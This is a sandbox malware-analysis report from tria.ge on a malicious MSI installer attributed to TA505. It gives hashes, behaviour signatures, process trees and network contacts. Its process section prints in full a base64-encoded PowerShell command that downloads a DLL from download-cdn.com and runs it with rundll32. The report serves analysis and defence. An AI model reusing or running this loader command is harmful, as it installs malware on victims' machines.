Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    92s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/12/2022, 17:57 UTC

General

  • Target

    SetupSoftware.msi

  • Size

    11.0MB

  • MD5

    c4e9e9a06001c6197de2ea2fec3d2214

  • SHA1

    369006350f6b4c43c7f51a90deb5e73a20156b55

  • SHA256

    e4edb4cc8f35c7bab6e89774a279593d492714fce9865e53879f87d3704ad96c

  • SHA512

    00008fd26c3047afbbc73fc19d20700861e9501b1c9509b7abcfd218a814a2b0aa24fa934338942aee809ca53240b539e77f6d91013cae0eee076282e4047156

  • SSDEEP

    196608:6e9dQDU9N3glGcBo/6xDD7yLEY2sNd0nOn1q1eUD9p8b3lWG7uCMkCA:N8g91gGcBD7yLfmz1rGYG6CMi

Score
10/10

Malware Config

Signatures

  • TA505

    Cybercrime group active since 2015, responsible for families like Dridex and Locky.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\SetupSoftware.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:884
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 5446B683234513AB04DBC70FEC9C133A
      2⤵
      • Loads dropped DLL
      PID:4624
    • C:\Windows\Installer\MSI2D8E.tmp
      "C:\Windows\Installer\MSI2D8E.tmp" /DontWait /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
      2⤵
      • Executes dropped EXE
      PID:2136
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAEwAaQB0AGUAcwBvAGYAdABcAEkAbgBzAHQAYQBsAGwAIgApAC4AUABhAHQAaAAgAC0AbABlAGEAZgA7AA0ACgAkAGQAaQByACAAPQAgACQAZQBuAHYAOgBwAHIAbwBnAHIAYQBtAGQAYQB0AGEAOwANAAoAJABmAG4AIAA9ACAAJABkAGkAcgAgACsAIAAiAFwAIgAgACsAIAAoAEcAZQB0AC0AUgBhAG4AZABvAG0AKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAeAA4ACIAKQAgACsAIAAiAC4AZABhAHQAIgANAAoAJAB3AGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAGQAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AZABvAHcAbgBsAG8AYQBkAC0AYwBkAG4ALgBjAG8AbQAiADsADQAKACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGQAIAArACAAIgAvAGQAbwB3AG4AbABvAGEAZAAuAHAAaABwAD8AZgA9AEwAZAByAHAALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA==
    1⤵
    • Blocklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\ProgramData\262b9ef0.dat",DllRegisterServer
      2⤵
        PID:3400

    Network

    • flag-unknown
      DNS
      download-cdn.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      download-cdn.com
      IN A
      Response
      download-cdn.com
      IN A
      68.183.114.219
    • 20.42.65.85:443
      322 B
      7
    • 68.183.114.219:443
      download-cdn.com
      powershell.exe
      260 B
      5
    • 104.80.225.205:443
      322 B
      7
    • 95.101.78.106:80
      322 B
      7
    • 87.248.202.1:80
      322 B
      7
    • 87.248.202.1:80
      322 B
      7
    • 8.8.8.8:53
      download-cdn.com
      dns
      powershell.exe
      62 B
      78 B
      1
      1

      DNS Request

      download-cdn.com

      DNS Response

      68.183.114.219

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\Installer\MSI106B.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSI106B.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSI23E4.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSI23E4.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSI2898.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSI2898.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSI28D8.tmp

      Filesize

      927KB

      MD5

      b27a994e40bee85c14d3227ea91696a9

      SHA1

      609a959b0f47865803e2c45a8bc4390f1d08b57a

      SHA256

      ebf432e9b8068e139e85e2c26a1d67238b3c6071158cd43f4926029ba187c190

      SHA512

      66b2cfa6b7c3cf793f478bc69e084e4ea008dab4101eaf8ce3143291d94dbcebedccd29c309d56185261fdbcccd30697cd898bf8ce8e1f9dcdf12fc2037d1542

    • C:\Windows\Installer\MSI28D8.tmp

      Filesize

      927KB

      MD5

      b27a994e40bee85c14d3227ea91696a9

      SHA1

      609a959b0f47865803e2c45a8bc4390f1d08b57a

      SHA256

      ebf432e9b8068e139e85e2c26a1d67238b3c6071158cd43f4926029ba187c190

      SHA512

      66b2cfa6b7c3cf793f478bc69e084e4ea008dab4101eaf8ce3143291d94dbcebedccd29c309d56185261fdbcccd30697cd898bf8ce8e1f9dcdf12fc2037d1542

    • C:\Windows\Installer\MSI29D3.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSI29D3.tmp

      Filesize

      550KB

      MD5

      bda991d64e27606ac1d3abb659a0b33b

      SHA1

      a87ee1430f86effa5488ae654704c40aca3424c6

      SHA256

      ffea8222126b77f8da93e27edbadeb8b97fb023ef0d6a51522c35688f66283ca

      SHA512

      94fe1eadd4b4325fc1a8c769180c6ecf92e2dbf9f8262d6746fada603929977f3d40100ba84cffb4074c6900a2b2d307355e6a5116e6f16d9d3173fa17ad461f

    • C:\Windows\Installer\MSI2D8E.tmp

      Filesize

      549KB

      MD5

      6aac525cfcdd6d3978c451bba2bb9cb3

      SHA1

      417a1c4312bdaadf832acf153c423906365fb027

      SHA256

      9dbaf4e4632e70652ff72bb7890c35e3b9cd7a6939b29b5eeec0c636d098c64e

      SHA512

      3c39487dbfdb6ee84cc5eddd5e8e9d1610ffb9fe55913e47f126b47d6fd5bc04b691a9bb765963d998b3db92d87192a4a91807bbe7559bfc4804a7c2beb32f42

    • memory/1648-145-0x00000158EDF40000-0x00000158EDF62000-memory.dmp

      Filesize

      136KB

    • memory/1648-146-0x00007FFED97F0000-0x00007FFEDA2B1000-memory.dmp

      Filesize

      10.8MB

    • memory/1648-147-0x00007FFED97F0000-0x00007FFEDA2B1000-memory.dmp

      Filesize

      10.8MB

    • memory/1648-149-0x00007FFED97F0000-0x00007FFEDA2B1000-memory.dmp

      Filesize

      10.8MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.